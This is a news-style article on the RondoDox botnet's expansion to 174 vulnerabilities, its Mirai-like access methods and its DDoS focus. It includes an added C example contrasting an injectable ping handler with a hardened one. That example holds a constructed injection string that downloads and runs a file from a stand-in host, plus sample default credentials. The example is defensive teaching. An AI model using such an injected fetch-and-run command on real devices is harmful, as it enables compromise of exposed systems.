The RondoDox botnet has significantly broadened its scope and now targets 174 vulnerabilities, according to a recent report by Bitsight, up from the 56 it was known to target at the end of 2025. At the same time, its operators have refined how they select and exploit those flaws.
Evolution of RondoDox Attacks
First observed in March 2025, RondoDox started out with broad, indiscriminate vulnerability scanning. By the end of that year it was known to target 56 vulnerabilities, some of them without CVE identifiers; React2Shell was among the flaws it exploited at that stage.
Bitsight now reports a marked shift in approach. Rather than spraying exploits indiscriminately, the operators concentrate on the vulnerabilities most likely to yield a successful compromise.
Strategic Targeting and Techniques
RondoDox shares several traits with the Mirai botnet, particularly in its initial-access methods: logging in with weak or default credentials and abusing unsanitized input in exposed device services. Unlike Mirai, though, RondoDox gives priority to launching distributed denial-of-service (DDoS) attacks over simply growing its pool of infected devices.
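The two initial-access paths above are easier to reason about with a concrete model. The following is an added example, not code from the Bitsight report or from RondoDox itself: it models the "unsanitized input" path as a device web handler that splices a user-supplied host into a shell command (the assumption here is command injection in a diagnostics page; the article does not name the specific input flaw), shows the validated argv-based alternative, and models the "weak credentials" path as a check against a constructed list of factory defaults. The injection payload, the 203.0.113.1 address and the credential list are all constructed for illustration.

```c
/* Added example modelling Mirai-style initial access on an embedded device.
 * Illustrative only; not RondoDox, Mirai or Bitsight code. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Vulnerable pattern: the "host" parameter from a diagnostics page is spliced
 * straight into a shell command line. A constructed payload such as
 *   "8.8.8.8; wget http://203.0.113.1/bot -O /tmp/b; sh /tmp/b"
 * would run the attacker's commands with the web server's privileges.
 * Returns 1 if the command fit in the buffer. */
int build_ping_cmd_unsafe(const char *host, char *out, size_t outlen) {
    return snprintf(out, outlen, "ping -c 1 %s", host) < (int)outlen;
}

/* Hardened check: accept only characters that can appear in a hostname or
 * IPv4 literal, bound the length, and refuse a leading '-' (which ping would
 * parse as an option). Every shell metacharacter is rejected. */
int is_safe_host(const char *host) {
    size_t n = strlen(host);
    if (n == 0 || n > 253) return 0;
    if (host[0] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return 0;
    }
    return 1;
}

/* Even a validated host should not go through a shell: build an argv for an
 * exec-style API so that no metacharacter is ever interpreted. Returns 0 on
 * rejection, otherwise the number of argv entries filled (excluding NULL). */
int build_ping_argv(const char *host, const char *argv[], int max) {
    if (max < 5 || !is_safe_host(host)) return 0;
    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = "1";
    argv[3] = host;
    argv[4] = NULL;
    return 4;
}

/* Weak-credential path. A device that still answers to one of these pairs
 * is a scan-and-login target regardless of any web vulnerability.
 * Constructed sample data, not a list from any real device or report. */
static const char *DEFAULT_CREDS[][2] = {
    {"admin", "admin"}, {"root", "root"}, {"admin", "1234"}, {"user", "user"},
};

int uses_default_credentials(const char *user, const char *pass) {
    size_t count = sizeof(DEFAULT_CREDS) / sizeof(DEFAULT_CREDS[0]);
    for (size_t i = 0; i < count; i++)
        if (strcmp(user, DEFAULT_CREDS[i][0]) == 0 &&
            strcmp(pass, DEFAULT_CREDS[i][1]) == 0)
            return 1;
    return 0;
}

int main(void) {
    /* Constructed injection payload, not an observed RondoDox payload. */
    const char *inj = "8.8.8.8; wget http://203.0.113.1/bot -O /tmp/b; sh /tmp/b";
    char cmd[256];
    const char *argv[5];

    build_ping_cmd_unsafe(inj, cmd, sizeof cmd);
    printf("unsafe command line : %s\n", cmd);
    printf("is_safe_host(inj)   : %d\n", is_safe_host(inj));
    printf("argv entries for inj: %d\n", build_ping_argv(inj, argv, 5));
    printf("argv entries for ok : %d\n", build_ping_argv("8.8.8.8", argv, 5));
    printf("admin/admin default : %d\n", uses_default_credentials("admin", "admin"));
    return 0;
}
```

The point of the argv builder is that validation and shell avoidance are independent defences: the allow-list stops the payload at the door, and the exec-style call means a future gap in the allow-list still cannot become command execution.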
To support these operations, RondoDox scans the internet for exposed devices and uses its own infrastructure to deliver malware implants built to evade detection. The implants remove competing malware already present on the device and then prepare it for running their own payload.
Ongoing Adaptation and Challenges
Bitsight’s investigation found that the botnet’s operators use more than 24 IP addresses for tasks such as exploiting devices and distributing commands. They also churn through their target list frequently, at times attempting as many as 49 different flaws in a single day, but most of those vulnerabilities are dropped again quickly.
The operators clearly track new vulnerability disclosures, yet they struggle to implement some of the corresponding exploits correctly. This points to a trial-and-error process in which they test exploits in the wild, keep the ones that succeed and discard the rest.
Bitsight also corrects two earlier assumptions about the botnet: RondoDox does not use a loader-as-a-service for distribution, and earlier reports of peer-to-peer functionality are unfounded.
